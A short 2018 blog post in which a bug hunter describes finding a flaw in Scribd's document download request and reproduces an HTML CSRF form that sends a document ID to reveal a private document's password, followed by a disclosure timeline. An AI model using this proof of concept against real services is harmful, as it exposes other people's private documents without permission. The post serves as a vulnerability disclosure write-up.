How i Found Information Disclosure on Scribd.com

Zerb0a
Zerb0a
Nov 22, 2018 · 2 min read

hi, this is my first write up on medium.com.
11 days ago i found a vulnerability on scribd.com when i finding an answer of my homework ( I was lazy at that time).

then I made a document and made the document private

In my heart I thought that the download button made me curious, so I decided to intercept before pressing the download button. and I found a Request with the POST method in the url: https://www.scribd.com/document_downloads/request_document_for_download

Then I will make a document and give a password (make private) the document and try to get access from another account. After that I created a new account and made a CSRF whose contents were more or less like this:

<html>

<title> Scribd VUlnerability </ title>

<body>

<form action = “https://www.scribd.com/document_downloads/request_document_for_download" method = “POST”>

<input type = “hidden” name = “id” value = “(ID FILE)” />

<input type = “submit” value = “Submit request” />

</ form>

</ body>

</ html>.

and try to do pentesting.

Bingo! after that I managed to get the password to see the private document. After that I asked whether there was a bug bounty program or not to the IT security scribd. after 11 days (When I wrote this) I immediately reported this bug to the Scribd team so that it could be fixed.

Full Video PoC on my Blog :
https://raflipasya19.blogspot.co.id
My Youtube Channel :
T-GOX Channel

Status:

  • 19 November 2018 16:59 PM = Reported To Scribd Security Team
  • 20 November 2018 01:58 AM = Their team Review my report
  • No response after 4 Days, so i decided to Write Up this issue

Welcome to a place where words matter. On Medium, smart voices and original ideas take center stage - with no ads in sight. Watch
Follow all the topics you care about, and we’ll deliver the best stories for you to your homepage and inbox. Explore
Get unlimited access to the best stories on Medium — and support writers while you’re at it. Just $5/month. Upgrade

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store